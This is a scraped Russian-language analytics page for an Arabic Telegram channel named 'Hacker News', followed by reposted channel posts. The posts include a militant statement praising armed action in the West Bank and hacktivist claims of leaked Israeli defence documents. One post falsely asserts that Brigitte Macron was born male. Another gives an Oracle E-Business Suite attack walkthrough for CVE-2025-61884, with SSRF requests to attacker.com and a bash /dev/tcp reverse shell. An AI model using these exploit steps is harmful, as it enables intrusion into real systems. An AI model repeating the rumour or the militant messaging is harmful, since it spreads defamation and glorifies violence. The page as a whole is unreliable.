Hacker News
المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين صفحتنا الأولى https://www.facebook.com/HackerNews2
Больше📈 Аналитический обзор Telegram-канала Hacker News
Канал Hacker News (@hackernewsar) языкового сегмента Арабский является активным участником. Сейчас сообщество объединяет 13 308 подписчиков, занимая 9 569 место в категории Технологии и приложения и 5 739 место в регионе Саудовская Аравия.
📊 Показатели аудитории и динамика
С момента создания невідомо проект демонстрирует стремительный рост, собрав аудиторию из 13 308 подписчиков.
Согласно последним данным от 30 июня, 2026, канал показывает стабильную активность. За последние 30 дней изменение числа участников составило 20, а за последние 24 часа — 2, при этом общий охват остаётся высоким.
- Статус верификации: Не верифицирован
- Уровень вовлечённости (ER): Средний показатель вовлечённости аудитории составляет 17.15%. В первые 24 часа после публикации контент обычно набирает 5.35% реакций от общего числа подписчиков.
- Охват публикаций: В среднем каждый пост получает 2 280 просмотров. В течение первых суток публикация набирает 711 просмотров.
- Реакции и взаимодействия: Аудитория активно поддерживает контент: среднее количество реакций на один пост — 18.
- Тематические интересы: Контент сосредоточен на ключевых темах, таких как نِظَام, شَرِكَة, اِختِرَاق, مَجمُوعَة, بَيَان.
📝 Описание и контентная политика
Автор описывает ресурс как площадку для выражения субъективного мнения:
“المصدر العربي الأول لأخبار الهاكرز و ملتقى الأحرار و المناضلين
صفحتنا الأولى https://www.facebook.com/HackerNews2”
Благодаря высокой частоте обновлений (последние данные получены 01 июля, 2026) канал поддерживает актуальность и высокий уровень охвата публикаций. Аналитика показывает, что аудитория активно взаимодействует с контентом, что делает его важной точкой влияния в категории Технологии и приложения.
إن العمل العسكري في الضفة الغربية لن يتوقف، وعلى العدو أن ينتظر المزيد طالما استمرت سياسة الاغتيالات الجبانة والانتهاكات والجرائم بحق أبناء شعبنا من جنود وقطعان مستوطني العدو، وهذا ما نؤكده لأهلنا المرابطين أننا بإذن الله على قدرٍ من المسؤولية ونكمل المسير بكل إصرار وثبات حتى النصر، وأن وعد الله عز وجل بزوال كيانهم قد اقترب.#HackerNews #سرايا_القدس
لا سبيل للتخفي بعد الآن#HackerNews #HandalaHack
الشعاع الحديدي هو نظام دفاع جوي بالليزر الموجه طورته شركة رافائيل وتم الكشف عنه في 11 فبراير 2014.ودخل الخدمة في الجيش الصهـيوني في 17 أغسطس 2020.صمم لتدمير الصواريخ قصيرة المدى والقذائف.نشرت المجموعة عدداً من الوثائق والصور قالت إنها حصلت عليها من خوادم تابعة لشركات صهيـونية عاملة في قطاع الدفاع، بينها شركة «مايا» المتخصصة في الصناعات العسكرية. كما تضمّنت الملفات المسربة صوراً لعقود موقعة بين الجيش الصهيـوني وعدد من الجهات الدفاعية في أستراليا ودول أوروبية، ما يبن مدى اختراق البنية التحتية الدفاعية الصهيـونية. تعد "MAYA" مسؤولة عن الأبحاث والتطوير لصالح شركات كبرى مثل "إلبيت سيستمز" و"رافائيل"، الذراعين الصناعي والتقني لوزارة الدفاع الصهـيونية. #HackerNews #CyberIsnaadFront
وأثار جنس بريجيت الكثير من الجدل حيث يرى الكثيرين أن السيدة الأولى الفرنسية ولدت ذكرًا وفقًا للكثير من التقارير حيث كانت تحمل الاسم "جان ميشيل ترونيو" Jean Michel Trogneux وقامت بتغيير جنسها واسمها.#HackerNews
text /OA_HTML /OA_HTML/RF.jsp /OA_HTML/AppsLocalLogin.jspفحص البورتات الشائعة: غالبًا ما تُنشر صفحات تسجيل الدخول EBS على منافذ 8000 و 8001 و 8080 و 4443 و 1521 وغيرها. استغلال إفصاحات النظام (Error Messages, Banners): قد تعرض صفحة الدخول أو الأخطاء تفاصيل عن الإصدار أو اسم التطبيق (Oracle Applications/Oracle E-Business Suite). الفهارس والتسريبات: قد تظهر عناوين الأنظمة المكشوفة من خلال فهارس البحث أو تسريبات بيانات الشركات. محاولة الوصول عبر كلمات مرور افتراضية: بعض المؤسسات تُبقي حسابات/خدمات بصلاحيات افتراضية دون تغيير كلمات المرور الأصلية. طريقة الاستغلال: يكفي إرسال طلب HTTP إلى الرابط vulnerable يضم رابطًا خبيثًا في حقل return_url مثل:
text
/OA_HTML/configurator/UiServlet?return_url=http://attacker.com/evil
فيقوم النظام بتنفيذ الطلب وإرجاع البيانات أو تنفيذ كود خبيث أحيانًا إذا تم دمج الثغرة مع طرق حقن أخرى.
النتيجة عند الاستغلال:
الوصول غير المصرح إلى بيانات حساسة من النظام أو الشبكة الداخلية.
في بعض السيناريوهات، يمكن توسعة الهجوم ليصبح تنفيذ أوامر عن بعد (RCE) من خلال حقن قوالب XSL أو هجمات CRLF.
ملخص عملي للسلوك التقني:
المهاجم يرسل رابط طلب HTTP مثل:
text GET /OA_HTML/configurator/UiServlet?return_url=http://malicious-site.com/payloadفيستجيب الخادم ويُنفذ الطلب، ما يسمح للمهاجم بتنفيذ هجمات داخلية أو تزوير مصادر البيانات أو الحصول على بيانات سرية. في بعض الحالات يقوم المهاجم بدمج SSRF مع حقن قوالب XSL أو هجمات CRLF، فيصبح بإمكانه رفع web shell أو تنفيذ reverse shell عبر أوامر مثل:
text
bash -i >& /dev/tcp/<attacker_ip>/<port> 0>&1
#HackerNews #Oracle #CVE_2025_61884كلمة أوراكل مشتقة من الكلمة اللاتينية oraculum وتعني "العرافة" التي تمتلك المعرفة ولديها إطّلاع على الأمور الغيبية.#HackerNews #DigitalID #الهويةـالرقمية #العبوديةـالرقمية
وذكرت مجموعة القرصنة الروسية Lynx أنها تمكنت من الوصول إلى ذاكرة التخزين المؤقت لملفات بحجم 4 تيرابايت عن طريق اختراق شركة المقاولات والصيانة والبناء Dodd Group المتعاقدة مع وزارة الدفاع، وقالت الشركة إن هجومًا إلكترونيًا أدى إلى الوصول إلى أنظمتها الداخلية.وصرح الكولونيل "فيل إنغرام" لصحيفة ذا صن البريطانية أن هجومًا بهذا الحجم سيُثير قلقا بالغا في الولايات المتحدة، وتابع: «أي معلومات حساسة، بدءاً من رسائل البريد الإلكتروني وحتى أرقام الهواتف المحمولة، ستكون مفيدة لأعدائنا». #HackerNews
Уже доступно! Исследование Telegram 2025 — ключевые инсайты года 
